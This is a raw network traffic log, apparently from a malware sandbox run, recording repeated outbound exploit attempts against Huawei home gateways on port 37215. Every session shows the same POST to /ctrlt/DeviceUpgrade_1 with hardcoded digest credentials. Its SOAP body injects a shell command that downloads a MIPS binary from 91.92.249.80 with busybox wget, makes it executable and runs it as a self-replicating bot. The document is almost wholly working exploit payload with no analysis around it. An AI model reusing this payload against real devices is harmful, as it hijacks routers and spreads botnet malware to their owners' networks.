                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          27192.168.2.2337890197.203.50.21137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102762938 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          28192.168.2.2356212197.108.181.12737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102772951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          29192.168.2.2354192150.104.69.22937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102787971 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          30192.168.2.235648641.179.158.1637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102787971 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          31192.168.2.2339566197.226.15.21737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102792025 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          32192.168.2.2357810157.125.35.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102799892 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          33192.168.2.2351458197.199.221.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102804899 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          34192.168.2.233296041.213.7.11737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102813959 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          35192.168.2.233302841.41.111.22537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102812052 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          36192.168.2.2333094203.30.50.21237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:52.102813005 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
